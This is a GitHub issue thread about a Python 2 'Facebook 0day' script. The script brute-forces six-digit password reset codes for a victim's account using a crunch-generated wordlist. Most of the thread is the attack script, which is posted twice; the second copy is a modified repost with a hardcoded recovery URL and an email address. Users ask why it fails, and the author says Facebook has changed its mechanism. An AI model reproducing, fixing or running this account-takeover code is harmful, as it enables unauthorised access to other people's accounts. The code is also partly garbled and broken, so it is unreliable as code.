Chaudhary-Adeel
commented
6 years ago Which Code ? can you point it here?
Open muhommadalmusawi opened 6 years ago
Chaudhary-Adeel
commented
6 years ago Which Code ? can you point it here?
muhommadalmusawi
commented
6 years ago I tried it on my account and put it in my password and did not extract it. Why
Chaudhary-Adeel
commented
6 years ago Which Tool You're Talking about?
muhommadalmusawi
commented
6 years ago This script .
.
.
.
.
try: import urllib2, ssl, sys, time, re, os except ImportError: exit("[#] Please install Newer Version of Python!")
if "linux" in sys.platform: os.system('clear') else: os.system('cls')
def banner(): print """
| | | | | (_) | | | | | | | / \ / _|
| | | | |_ | | | |_| | | | | / \/ __ | |
| |/| | ' | | / \ |/ _` | _| | | / | ' | |
\ /\ / | | | | || / | | | (| | | | _/\ () | | | | |
\/ \/|| |||___| |/_,|_| ___/\/|| ||_|
'Facebook 0day' Password reset Code bruteforcer
Author: Muhammad Adeel Mail: Chaudhary1337@gmail.com Blog: http://urdusecurity.blogspot.com
[#] To Get Password list of all possible reset codes, Do it.
root@bt~$ crunch 6 6 1234567890 -o passlist.txt ----------------------------------------------------------------\n """
banner() victim_profile = raw_input("[#] Victim Facebook ID: ") password_list = raw_input("[#] Password List: ")
def ZerOday(): print "\n[!] Please sit down and have some snacks Untill exploit gets his job done!\n" try: passwd = open(password_list, 'r').readlines() except IOError: exit("[#] Unable to Find Password list.") for passw in passwd: passw = passw.rstrip() try: base_url = 'https://m.facebook.com/recover/password?u='+victim_profile+'&n='+passw req = urllib2.urlopen(base_url).read() except: exit("[#] Unable to Send Request.") regex = re.search('password_new', req) if regex: print "\n\n[#] The Reset code is Found => {0}".format(passw) exit() else: sys.stdout.write("Trying: " + passw + '\n') sys.stdout.flush()
ZerOday()
def main(): if name == 'main': main()
Chaudhary-Adeel
commented
6 years ago Please Post the Error You Receive.
muhommadalmusawi
commented
6 years ago I did not take any mistake, but the script does not extract the password, which consists of six digits and the recovery code You can modify it to do the job you want Thank
Chaudhary-Adeel
commented
6 years ago Okay I checked it and you're right. I wrote this 4 years ago and facebook has changed its mechanism so this needs updates but i dnt have enough time, may be at some point i;ll update it.
muhommadalmusawi
commented
6 years ago Thank you Professor
Hanoasali
commented
1 year ago root@bt~$ crunch 6 6 1234567890 -o passlist.txt ----------------------------------------------------------------\n """
banner() victim_profile = raw_input("[#] Victim Facebook ID: ")gn_no@hotmail.com password_list = raw_input("[#] Password List: ")
def ZerOday(): print "\n[!] Please sit down and have some snacks Untill exploit gets his job done!\n" try: passwd = open(password_list, 'r').readlines() except IOError: exit("[#] Unable to Find Password list.") for passw in passwd: passw = passw.rstrip() try: base_url = 'https://m.facebook.com/recover/code/?em%5B0%5D=g%2A%2A%2A%40%2A%2A%2A%2A%2A%2A%2A&rm=send_email&c=%2Flogin%2F%3Fskip_api_login%3D1%26ap&hash=AUb6TKatViIQVr6dkfc&refsrc=deprecated&_rdr req = urllib2.urlopen(base_url).read() except: exit("[#] Unable to Send Request.") regex = re.search('password_new', req) if regex: print "\n\n[#] The Reset code is Found => {0}".format(passw) exit() else: sys.stdout.write("Trying: " + passw + '\n') sys.stdout.flush()
ZerOday()
def main(): if name == 'main': main()
Hello this code does not work